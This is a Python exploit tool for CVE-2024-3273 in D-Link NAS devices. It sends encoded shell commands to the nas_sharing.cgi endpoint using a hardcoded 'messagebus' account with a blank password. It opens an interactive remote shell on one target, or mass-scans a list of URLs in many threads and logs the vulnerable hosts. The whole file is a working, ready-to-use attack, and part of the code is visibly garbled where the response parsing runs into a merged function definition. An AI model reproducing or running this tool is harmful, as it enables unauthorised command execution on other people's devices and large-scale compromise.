import base64 import requests import argparse from rich.console import Console from alive_progress import alive_bar from typing import Tuple, Optional, List from prompt_toolkit import PromptSession from prompt_toolkit.formatted_text import HTML from prompt_toolkit.history import InMemoryHistory from concurrent.futures import ThreadPoolExecutor, as_completed from requests.packages.urllib3.exceptions import InsecureRequestWarning class DLink: def __init__(self, base_url: Optional[str]=None) -> None: self.base_url: Optional[str] = base_url self.session: requests.Session = requests.Session() self.console: Console = Console() requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def custom_print(self, message: str, header: str) -> None: header_colors: dict = {"+": "green", "-": "red", "!": "yellow", "*": "blue"} self.console.print( f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}" ) def execute_command(self, command: str = "id", verbose: bool = True) -> str: command_hex = ''.join(f'\\\\x{ord(c):02x}' for c in command) command_final = f"echo -e {command_hex}|sh".replace(' ', '\t') base64_cmd: str = base64.b64encode(command_final.encode()).decode() url: str = f"{self.base_url}/cgi-bin/nas_sharing.cgi" params: dict = { "user": "messagebus", "passwd": "", "cmd": "15", "system": base64_cmd, } try: response: requests.Response = self.session.get( url, params=params, verify=False, timeout=10 ) result: str = ( response.text.split(" Tuple[str, bool]: self.base_url = url result: str = self.execute_command(verbose=False) is_vulnerable: bool = bool(result) return f"{url} is vulnerable to CVE-2024-3273: {result}", is_vulnerable def interactive_shell(self) -> None: initial_result = self.execute_command() if initial_result: self.custom_print( f"{self.base_url} is vulnerable to CVE-2024-3273: {initial_result}", "!" ) self.custom_print("Opening interactive shell...", "+") session: PromptSession = PromptSession(history=InMemoryHistory()) while True: try: cmd: str = session.prompt( HTML("# "), default="" ).strip() if cmd.lower() == "exit": break elif cmd.lower() == "clear": self.console.clear() continue output: str = self.execute_command(cmd) if output: print(f"{output}\n") except KeyboardInterrupt: self.custom_print("Exiting interactive shell...", "!") break else: self.custom_print("System is not vulnerable or check failed.", "-") def check_urls_and_write_output( self, urls: List[str], max_workers: int, output_path: Optional[str] ) -> None: with ThreadPoolExecutor(max_workers=max_workers) as executor, alive_bar( len(urls), enrich_print=False ) as bar: futures = {executor.submit(self.check_single_url, url): url for url in urls} for future in as_completed(futures): result, is_vulnerable = future.result() if is_vulnerable: self.custom_print(result, "+") if output_path: with open(output_path, "a") as file: file.write(result) bar() def main() -> None: parser: argparse.ArgumentParser = argparse.ArgumentParser() parser.add_argument( "-u", "--url", help="Base URL for single target", default=None ) parser.add_argument( "-f", "--file", help="File containing list of URLs", default=None ) parser.add_argument( "-t", "--threads", help="Number of threads to use", type=int, default=20 ) parser.add_argument( "-o", "--output", help="Output file to save results", default=None ) args: argparse.Namespace = parser.parse_args() if args.url: dlink: DLink = DLink(args.url) dlink.interactive_shell() elif args.file: with open(args.file, "r") as f: urls: List[str] = f.read().splitlines() dlink = DLink() dlink.check_urls_and_write_output(urls, args.threads, args.output) else: parser.error( "No URL or file provided. Use -u to specify a single URL or -f to specify a file containing URLs." ) if __name__ == "__main__": main()